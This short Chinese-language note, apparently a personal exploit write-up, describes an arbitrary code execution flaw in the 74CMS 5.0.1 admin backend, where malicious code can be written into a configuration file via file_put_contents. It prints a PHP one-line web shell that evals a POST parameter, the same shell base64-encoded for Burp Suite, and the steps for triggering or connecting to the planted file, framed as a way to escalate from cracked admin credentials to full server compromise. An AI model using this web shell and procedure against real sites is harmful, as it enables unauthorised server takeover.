在74CMS 5.0.1版本中的管理后台由于过滤不严谨,可以向配置文件写入恶意代码导致任意代码执行。
file_put_contents(‘写进去的文件名称和格式’,写的内容)
一句话木马:<?php @eval($_POST['attack']);?>
可以在bp里直接加密:PD9waHAgQGV2YWwoJF9QT1NUWydhdHRhY2snXSk7Pz4K
这里需要访问url.php来激活403.php,url.php是一个页面,里面有程序代码可以跳转网址,我理解是访问它可以将刚才传进去的语句执行。
这里不一定访问激活,可以直接连接在当前即upload下的你传的文件
这个漏洞感觉就是你先跑出来后台管理员的用户和密码然后利用这个漏洞夸大危害直接黑进服务器。